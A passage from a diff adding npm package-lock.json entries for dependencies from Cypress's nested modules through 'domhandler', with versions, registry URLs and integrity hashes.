">=10" + } + }, + "node_modules/cypress/node_modules/is-ci": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/is-ci/-/is-ci-3.0.1.tgz", + "integrity": "sha512-ZYvCgrefwqoQ6yTyYUbQu64HsITZ3NfKX1lzaEYdkTDcfKzzCI/wthRRYKkdjHKFVgNiXKAKm65Zo1pk2as/QQ==", + "dev": true, + "dependencies": { + "ci-info": "^3.2.0" + }, + "bin": { + "is-ci": "bin.js" + } + }, + "node_modules/cypress/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": 
"sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/cypress/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/cypress/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/cypress/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/d": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/d/-/d-1.0.1.tgz", + "integrity": "sha512-m62ShEObQ39CfralilEQRjH6oAMtNCV1xJyEx5LpRYUVN+EviphDgUc/F3hnYbADmkiNs67Y+3ylmlG7Lnu+FA==", + "dependencies": { + "es5-ext": "^0.10.50", + "type": "^1.0.1" + } + }, + "node_modules/d/node_modules/type": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/type/-/type-1.2.0.tgz", + "integrity": "sha512-+5nt5AAniqsCnu2cEQQdpzCAh33kVx8n0VoFidKpB1dVVLAN/F+bgVOqOJqOnEnrhp222clB5p3vUlD+1QAnfg==" + }, + "node_modules/d3": { + "version": "3.5.17", + "resolved": "https://registry.npmjs.org/d3/-/d3-3.5.17.tgz", + "integrity": "sha1-vEZ0gAQ3iyGjYMn8fPUjF5B2L7g=", + "dev": true + }, + "node_modules/damerau-levenshtein": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/damerau-levenshtein/-/damerau-levenshtein-1.0.8.tgz", + "integrity": "sha512-sdQSFB7+llfUcQHUQO3+B8ERRj0Oa4w9POWMI/puGtuf7gFywGmkaLCElnudfTiKZV+NvHqL0ifzdrI8Ro7ESA==", + "dev": true + }, + "node_modules/dashdash": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", + "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", + "dependencies": { + "assert-plus": "^1.0.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/dashdash/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/dasherize": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/dasherize/-/dasherize-2.0.0.tgz", + "integrity": "sha1-bYCcnNDPe7iVLYD8hPoT1H3bEwg=" + }, + "node_modules/data-urls": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/data-urls/-/data-urls-3.0.2.tgz", + "integrity": "sha512-Jy/tj3ldjZJo63sVAvg6LHt2mHvl4V6AgRAmNDtLdm7faqtsx+aJG42rsyCo9JCoRVKwPFzKlIPx3DIibwSIaQ==", + "dev": true, + "dependencies": { + "abab": "^2.0.6", + "whatwg-mimetype": "^3.0.0", + "whatwg-url": "^11.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/data-urls/node_modules/tr46": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-3.0.0.tgz", + "integrity": "sha512-l7FvfAHlcmulp8kr+flpQZmVwtu7nfRV7NZujtN0OqES8EL4O4e0qqzL0DC5gAvx/ZC/9lk6rhcUwYvkBnBnYA==", + "dev": true, + "dependencies": { + 
"punycode": "^2.1.1" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/data-urls/node_modules/whatwg-url": { + "version": "11.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-11.0.0.tgz", + "integrity": "sha512-RKT8HExMpoYx4igMiVMY83lN6UeITKJlBQ+vR/8ZJ8OCdSiN3RwCq+9gH0+Xzj0+5IrM6i4j/6LuvzbZIQgEcQ==", + "dev": true, + "dependencies": { + "tr46": "^3.0.0", + "webidl-conversions": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/data-view-buffer": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/data-view-buffer/-/data-view-buffer-1.0.1.tgz", + "integrity": "sha512-0lht7OugA5x3iJLOWFhWK/5ehONdprk0ISXqVFn/NFrDu+cuc8iADFrGQz5BnRK7LLU3JmkbXSxaqX+/mXYtUA==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.6", + "es-errors": "^1.3.0", + "is-data-view": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/data-view-byte-length": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/data-view-byte-length/-/data-view-byte-length-1.0.1.tgz", + "integrity": "sha512-4J7wRJD3ABAzr8wP+OcIcqq2dlUKp4DVflx++hs5h5ZKydWMI6/D/fAot+yh6g2tHh8fLFTvNOaVN357NvSrOQ==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "es-errors": "^1.3.0", + "is-data-view": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/data-view-byte-offset": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/data-view-byte-offset/-/data-view-byte-offset-1.0.0.tgz", + "integrity": "sha512-t/Ygsytq+R995EJ5PZlD4Cu56sWa8InXySaViRzw9apusqsOO2bQP+SbYzAhR0pFKoB+43lYy8rWban9JSuXnA==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.6", + "es-errors": "^1.3.0", + "is-data-view": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/date-fns": { + "version": "2.28.0", + "resolved": "https://registry.npmjs.org/date-fns/-/date-fns-2.28.0.tgz", + "integrity": "sha512-8d35hViGYx/QH0icHYCeLmsLmMUheMmTyV9Fcm6gvNwdw31yXXH+O85sOBJ+OLnLQMKZowvpKb6FgMIQjcpvQw==", + "engines": { + "node": ">=0.11" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/date-fns" + } + }, + "node_modules/dateformat": { + "version": "1.0.4-1.2.3", + "resolved": "https://registry.npmjs.org/dateformat/-/dateformat-1.0.4-1.2.3.tgz", + "integrity": "sha1-TBKxAb3buIgMI1babkVEWaXri3U=", + "engines": { + "node": "*" + } + }, + "node_modules/daterangepicker": { + "version": "2.1.27", + "resolved": "https://registry.npmjs.org/daterangepicker/-/daterangepicker-2.1.27.tgz", + "integrity": "sha512-D12idm34JQYLbhQn9oaZQGuSoLC7C4RQypx4yThqiPO+56ejrWMKN+89/KWf1RwYENwUdWOSSqzF5ZF2EkiE5g==", + "dev": true, + "dependencies": { + "jquery": ">=1.10", + "moment": "^2.9.0" + } + }, + "node_modules/dayjs": { + "version": "1.11.0", + "resolved": "https://registry.npmjs.org/dayjs/-/dayjs-1.11.0.tgz", + "integrity": "sha512-JLC809s6Y948/FuCZPm5IX8rRhQwOiyMb2TfVVQEixG7P8Lm/gt5S7yoQZmC8x1UehI9Pb7sksEt4xx14m+7Ug==", + "dev": true + }, + "node_modules/debug": { + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { 
+ "optional": true + } + } + }, + "node_modules/debug/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/debuglog": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/debuglog/-/debuglog-1.0.1.tgz", + "integrity": "sha1-qiT/uaw9+aI1GDfPstJ5NgzXhJI=", + "engines": { + "node": "*" + } + }, + "node_modules/decamelize": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/decamelize/-/decamelize-1.2.0.tgz", + "integrity": "sha1-9lNNFRSCabIDUue+4m9QH5oZEpA=", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/decimal.js": { + "version": "10.4.3", + "resolved": "https://registry.npmjs.org/decimal.js/-/decimal.js-10.4.3.tgz", + "integrity": "sha512-VBBaLc1MgL5XpzgIP7ny5Z6Nx3UrRkIViUkPUdtl9aya5amy3De1gsUUSB1g3+3sExYNjCAsAznmukyxCb1GRA==", + "dev": true + }, + "node_modules/decode-named-character-reference": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/decode-named-character-reference/-/decode-named-character-reference-1.0.2.tgz", + "integrity": "sha512-O8x12RzrUF8xyVcY0KJowWsmaJxQbmy0/EtnNtHRpsOcT7dFk5W598coHqBVpmWo1oQQfsCqfCmkZN5DJrZVdg==", + "dev": true, + "dependencies": { + "character-entities": "^2.0.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/wooorm" + } + }, + "node_modules/decode-uri-component": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/decode-uri-component/-/decode-uri-component-0.2.2.tgz", + "integrity": "sha512-FqUYQ+8o158GyGTrMFJms9qh3CqTKvAqgqsTnkLI8sKu0028orqBhxNMFkFen0zGyg6epACD32pjVk58ngIErQ==", + "dev": true, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/decompress-response": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/decompress-response/-/decompress-response-6.0.0.tgz", + "integrity": "sha512-aW35yZM6Bb/4oJlZncMH2LCoZtJXTRxES17vE3hoRiowU2kWHaJKFkSBDnDR+cm9J+9QhXmREyIfv0pji9ejCQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "mimic-response": "^3.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/dedent": { + "version": "0.7.0", + "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", + "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", + "dev": true, + "license": "MIT" + }, + "node_modules/deep-diff": { + "version": "0.3.8", + "resolved": "https://registry.npmjs.org/deep-diff/-/deep-diff-0.3.8.tgz", + "integrity": "sha512-yVn6RZmHiGnxRKR9sJb3iVV2XTF1Ghh2DiWRZ3dMnGc43yUdWWF/kX6lQyk3+P84iprfWKU/8zFTrlkvtFm1ug==" + }, + "node_modules/deep-eql": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-3.0.1.tgz", + "integrity": "sha512-+QeIQyN5ZuO+3Uk5DYh6/1eKO0m0YmJFGNmFHGACpf1ClL1nmlV/p4gNgbl2pJGxgXb4faqo6UE+M5ACEMyVcw==", + "dev": true, + "dependencies": { + "type-detect": "^4.0.0" + }, + "engines": { + "node": ">=0.12" + } + }, + "node_modules/deep-equal": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/deep-equal/-/deep-equal-2.2.1.tgz", + "integrity": "sha512-lKdkdV6EOGoVn65XaOsPdH4rMxTZOnmFyuIkMjM1i5HHCbfjC97dawgTAy0deYNfuqUqW+Q5VrVaQYtUpSd6yQ==", + "dev": true, + "dependencies": { + "array-buffer-byte-length": "^1.0.0", + "call-bind": "^1.0.2", + "es-get-iterator": "^1.1.3", + "get-intrinsic": "^1.2.0", + 
"is-arguments": "^1.1.1", + "is-array-buffer": "^3.0.2", + "is-date-object": "^1.0.5", + "is-regex": "^1.1.4", + "is-shared-array-buffer": "^1.0.2", + "isarray": "^2.0.5", + "object-is": "^1.1.5", + "object-keys": "^1.1.1", + "object.assign": "^4.1.4", + "regexp.prototype.flags": "^1.5.0", + "side-channel": "^1.0.4", + "which-boxed-primitive": "^1.0.2", + "which-collection": "^1.0.1", + "which-typed-array": "^1.1.9" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/deep-extend": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/deep-extend/-/deep-extend-0.6.0.tgz", + "integrity": "sha512-LOHxIOaPYdHlJRtCQfDIVZtfw/ufM8+rVj649RIHzcm/vGwQRXFt6OPqIFWsm2XEMrNIEtWR64sY1LEKD2vAOA==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/deep-freeze": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/deep-freeze/-/deep-freeze-0.0.1.tgz", + "integrity": "sha512-Z+z8HiAvsGwmjqlphnHW5oz6yWlOwu6EQfFTjmeTWlDeda3FS2yv3jhq35TX/ewmsnqB+RX2IdsIOyjJCQN5tg==" + }, + "node_modules/deep-is": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", + "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==" + }, + "node_modules/deepmerge": { + "version": "4.2.2", + "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.2.2.tgz", + "integrity": "sha512-FJ3UgI4gIl+PHZm53knsuSFpE+nESMr7M4v9QcgB7S63Kj/6WqMiFQJpBBYz1Pt+66bZpP3Q7Lye0Oo9MPKEdg==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/default-browser": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/default-browser/-/default-browser-5.2.1.tgz", + "integrity": "sha512-WY/3TUME0x3KPYdRRxEJJvXRHV4PyPoUsxtZa78lwItwRQRHhd2U9xOscaT/YTf8uCXIAjeJOFBVEh/7FtD8Xg==", + "dev": true, + "license": "MIT", + "dependencies": { + "bundle-name": "^4.1.0", + "default-browser-id": "^5.0.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/default-browser-id": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/default-browser-id/-/default-browser-id-5.0.0.tgz", + "integrity": "sha512-A6p/pu/6fyBcA1TRz/GqWYPViplrftcW2gZC9q79ngNCKAeR/X3gcEdXQHl4KNXV+3wgIJ1CPkJQ3IHM6lcsyA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/defaults": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/defaults/-/defaults-1.0.4.tgz", + "integrity": "sha512-eFuaLoy/Rxalv2kr+lqMlUnrDWV+3j4pljOIJgLIhI058IQfWJ7vXhyEIHu+HtC738klGALYxOKDO0bQP3tg8A==", + "dependencies": { + "clone": "^1.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/defaults/node_modules/clone": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/clone/-/clone-1.0.4.tgz", + "integrity": "sha512-JQHZ2QMW6l3aH/j6xCqQThY/9OH4D/9ls34cgkUBiEeocRTU04tHfKPBsUK1PqZCUQM7GiA0IIXJSuXHI64Kbg==", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/define-data-property": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/define-data-property/-/define-data-property-1.1.4.tgz", + "integrity": "sha512-rBMvIzlpA8v6E+SJZoo++HAYqsLrkg7MSfIinMPFhmkorw7X+dOXVJQs+QT69zGkzMyfDnIMN2Wid1+NbL3T+A==", + "dependencies": { + "es-define-property": "^1.0.0", + "es-errors": "^1.3.0", + "gopd": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + 
"funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/define-lazy-prop": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/define-lazy-prop/-/define-lazy-prop-2.0.0.tgz", + "integrity": "sha512-Ds09qNh8yw3khSjiJjiUInaGX9xlqZDY7JVryGxdxV7NPeuqQfplOpQ66yJFZut3jLa5zOwkXw1g9EI2uKh4Og==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/define-properties": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/define-properties/-/define-properties-1.2.1.tgz", + "integrity": "sha512-8QmQKqEASLd5nx0U1B1okLElbUuuttJ/AnYmRXbbbGDWh6uS208EjD4Xqq/I9wK7u0v6O08XhTWnt5XtEbR6Dg==", + "license": "MIT", + "dependencies": { + "define-data-property": "^1.0.1", + "has-property-descriptors": "^1.0.0", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/define-property": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-2.0.2.tgz", + "integrity": "sha512-jwK2UV4cnPpbcG7+VRARKTZPUWowwXA8bzH5NP6ud0oeAxyYPuGZUAC7hMugpCdz4BeSZl2Dl9k66CHJ/46ZYQ==", + "dev": true, + "dependencies": { + "is-descriptor": "^1.0.2", + "isobject": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/defu": { + "version": "6.1.4", + "resolved": "https://registry.npmjs.org/defu/-/defu-6.1.4.tgz", + "integrity": "sha512-mEQCMmwJu317oSz8CwdIOdwf3xMif1ttiM8LTufzc3g6kR+9Pe236twL8j3IYT1F7GfRgGcW6MWxzZjLIkuHIg==", + "dev": true, + "license": "MIT" + }, + "node_modules/delay": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/delay/-/delay-5.0.0.tgz", + "integrity": "sha512-ReEBKkIfe4ya47wlPYf/gu5ib6yUG0/Aez0JQZQz94kiWtRQvZIQbTiehsnwHvLSWJnQdhVeqYue7Id1dKr0qw==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/delegates": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delegates/-/delegates-1.0.0.tgz", + "integrity": "sha1-hMbhWbgZBP3KWaDvRM2HDTElD5o=" + }, + "node_modules/denque": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/denque/-/denque-1.5.1.tgz", + "integrity": "sha512-XwE+iZ4D6ZUB7mfYRMb5wByE8L74HCn30FBN7sWnXksWc1LO1bPDl67pBR9o/kC4z/xSNAwkMYcGgqDV3BE3Hw==", + "engines": { + "node": ">=0.10" + } + }, + "node_modules/depd": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/depd/-/depd-1.1.2.tgz", + "integrity": "sha1-m81S4UwJd2PnSbJ0xDRu0uVgtak=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/dequal": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/dequal/-/dequal-2.0.3.tgz", + "integrity": "sha512-0je+qPKHEMohvfRTCEo3CrPG6cAzAYgmzKyxRiYSSDkS6eGJdyVJm7WaYA5ECaAD9wLB2T4EEeymA5aFVcYXCA==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/destroy": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz", + "integrity": "sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg==", + "engines": { + "node": ">= 0.8", + "npm": "1.2.8000 || >= 1.4.16" + } + }, + "node_modules/detect-libc": { + "version": "1.0.3", + "resolved": 
"https://registry.npmjs.org/detect-libc/-/detect-libc-1.0.3.tgz", + "integrity": "sha1-+hN8S9aY7fVc1c0CrFWfkaTEups=", + "bin": { + "detect-libc": "bin/detect-libc.js" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/detect-node": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/detect-node/-/detect-node-2.1.0.tgz", + "integrity": "sha512-T0NIuQpnTvFDATNuHN5roPwSBG83rFsuO+MXXH9/3N1eFbn4wcPjttvjMLEPWJ0RGUYgQE7cGgS3tNxbqCGM7g==", + "dev": true, + "license": "MIT" + }, + "node_modules/devlop": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/devlop/-/devlop-1.1.0.tgz", + "integrity": "sha512-RWmIqhcFf1lRYBvNmr7qTNuyCt/7/ns2jbpp1+PalgE/rDQcBT0fioSMUpJ93irlUhC5hrg4cYqe6U+0ImW0rA==", + "dev": true, + "dependencies": { + "dequal": "^2.0.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/wooorm" + } + }, + "node_modules/dezalgo": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/dezalgo/-/dezalgo-1.0.4.tgz", + "integrity": "sha512-rXSP0bf+5n0Qonsb+SVVfNfIsimO4HEtmnIpPHY8Q1UCzKlQrDMfdobr8nJOOsRgWCyMRqeSBQzmWUMq7zvVig==", + "dev": true, + "dependencies": { + "asap": "^2.0.0", + "wrappy": "1" + } + }, + "node_modules/diff": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/diff/-/diff-5.2.0.tgz", + "integrity": "sha512-uIFDxqpRZGZ6ThOk84hEfqWoHx2devRFvpTZcTHur85vImfaxUbTW9Ryh4CpCuDnToOP1CEtXKIgytHBPVff5A==", + "dev": true, + "license": "BSD-3-Clause", + "engines": { + "node": ">=0.3.1" + } + }, + "node_modules/diff-match-patch": { + "version": "1.0.5", + "resolved": "git+ssh://git@github.com/overleaf/diff-match-patch.git#89805f9c671a77a263fc53461acd62aa7498f688", + "integrity": "sha512-UfwfKGxT/Wm2KaxFSZsp7/+YOnAgIzxQXs86zu1IFMLU/+3ouxnEvXqPDn3yxSxlsO4r1B+I2GGQHsIthp6/7Q==", + "license": "Apache-2.0" + }, + "node_modules/diff3": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/diff3/-/diff3-0.0.3.tgz", + "integrity": "sha512-iSq8ngPOt0K53A6eVr4d5Kn6GNrM2nQZtC740pzIriHtn4pOQ2lyzEXQMBeVcWERN0ye7fhBsk9PbLLQOnUx/g==", + "dev": true, + "license": "MIT" + }, + "node_modules/dijkstrajs": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/dijkstrajs/-/dijkstrajs-1.0.2.tgz", + "integrity": "sha512-QV6PMaHTCNmKSeP6QoXhVTw9snc9VD8MulTT0Bd99Pacp4SS1cjcrYPgBPmibqKVtMJJfqC6XvOXgPMEEPH/fg==", + "dev": true + }, + "node_modules/dir-glob": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/dir-glob/-/dir-glob-3.0.1.tgz", + "integrity": "sha512-WkrWp9GR4KXfKGYzOLmTuGVi1UWFfws377n9cc55/tb6DuqyF6pcQ5AbiHEshaDpY9v6oaSr2XCDidGmMwdzIA==", + "dev": true, + "dependencies": { + "path-type": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/dnd-core": { + "version": "16.0.1", + "resolved": "https://registry.npmjs.org/dnd-core/-/dnd-core-16.0.1.tgz", + "integrity": "sha512-HK294sl7tbw6F6IeuK16YSBUoorvHpY8RHO+9yFfaJyCDVb6n7PRcezrOEOa2SBCqiYpemh5Jx20ZcjKdFAVng==", + "dev": true, + "dependencies": { + "@react-dnd/asap": "^5.0.1", + "@react-dnd/invariant": "^4.0.1", + "redux": "^4.2.0" + } + }, + "node_modules/dns-packet": { + "version": "5.6.1", + "resolved": "https://registry.npmjs.org/dns-packet/-/dns-packet-5.6.1.tgz", + "integrity": "sha512-l4gcSouhcgIKRvyy99RNVOgxXiicE+2jZoNmaNmZ6JXiGajBOJAesk1OBlJuM5k2c+eudGdLxDqXuPCKIj6kpw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@leichtgewicht/ip-codec": "^2.0.1" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/doctrine": { + "version": "3.0.0", + "resolved": 
"https://registry.npmjs.org/doctrine/-/doctrine-3.0.0.tgz", + "integrity": "sha512-yS+Q5i3hBf7GBkd4KG8a7eBNNWNGLTaEwwYWUijIYM7zrlYDM0BFXHjjPWlWZ1Rg7UaddZeIDmi9jF3HmqiQ2w==", + "dependencies": { + "esutils": "^2.0.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/doctypes": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/doctypes/-/doctypes-1.1.0.tgz", + "integrity": "sha512-LLBi6pEqS6Do3EKQ3J0NqHWV5hhb78Pi8vvESYwyOy2c31ZEZVdtitdzsQsKb7878PEERhzUk0ftqGhG6Mz+pQ==" + }, + "node_modules/dom-accessibility-api": { + "version": "0.5.11", + "resolved": "https://registry.npmjs.org/dom-accessibility-api/-/dom-accessibility-api-0.5.11.tgz", + "integrity": "sha512-7X6GvzjYf4yTdRKuCVScV+aA9Fvh5r8WzWrXBH9w82ZWB/eYDMGCnazoC/YAqAzUJWHzLOnZqr46K3iEyUhUvw==", + "dev": true + }, + "node_modules/dom-converter": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/dom-converter/-/dom-converter-0.2.0.tgz", + "integrity": "sha512-gd3ypIPfOMr9h5jIKq8E3sHOTCjeirnl0WK5ZdS1AW0Odt0b1PaWaHdJ4Qk4klv+YB9aJBS7mESXjFoDQPu6DA==", + "dev": true, + "dependencies": { + "utila": "~0.4" + } + }, + "node_modules/dom-serializer": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/dom-serializer/-/dom-serializer-1.3.2.tgz", + "integrity": "sha512-5c54Bk5Dw4qAxNOI1pFEizPSjVsx5+bpJKmL2kPn8JhBUq2q09tTCa3mjijun2NfK78NMouDYNMBkOrPZiS+ig==", + "dev": true, + "dependencies": { + "domelementtype": "^2.0.1", + "domhandler": "^4.2.0", + "entities": "^2.0.0" + }, + "funding": { + "url": "https://github.com/cheeriojs/dom-serializer?sponsor=1" + } + }, + "node_modules/dom-walk": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/dom-walk/-/dom-walk-0.1.2.tgz", + "integrity": "sha512-6QvTW9mrGeIegrFXdtQi9pk7O/nSK6lSdXW2eqUspN5LWD7UTji2Fqw5V2YLjBpHEoU9Xl/eUWNpDeZvoyOv2w==", + "dev": true + }, + "node_modules/domelementtype": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/domelementtype/-/domelementtype-2.3.0.tgz", + "integrity": "sha512-OLETBj6w0OsagBwdXnPdN0cnMfF9opN69co+7ZrbfPGrdpPVNBUj02spi6B1N7wChLQiPn4CSH/zJvXw56gmHw==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/fb55" + } + ] + }, + "node_modules/domexception": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/domexception/-/domexception-4.0.0.tgz", + "integrity": "sha512-A2is4PLG+eeSfoTMA95/s4pvAoSo2mKtiM5jlHkAVewmiO8ISFTFKZjH7UAM1Atli/OT/7JHOrJRJiMKUZKYBw==", + "dev": true, + "dependencies": { + "webidl-conversions": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/domhandler": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/domhandler/-/domhandler-4.3.0.tgz", + "integrity": "sha512-fC0aXNQXqKSFTr2wDNZDhsEYjCiYsDWl3D01kwt25hm1YIPyDGHvvi3rw+PLqHAl/m71MaiF7d5zvBr0p5UB2g==", + "dev": true, + "dependencies": { + "domelementtype": "^2.2.0" + }, + "engines": { + "node": ">= 4" + 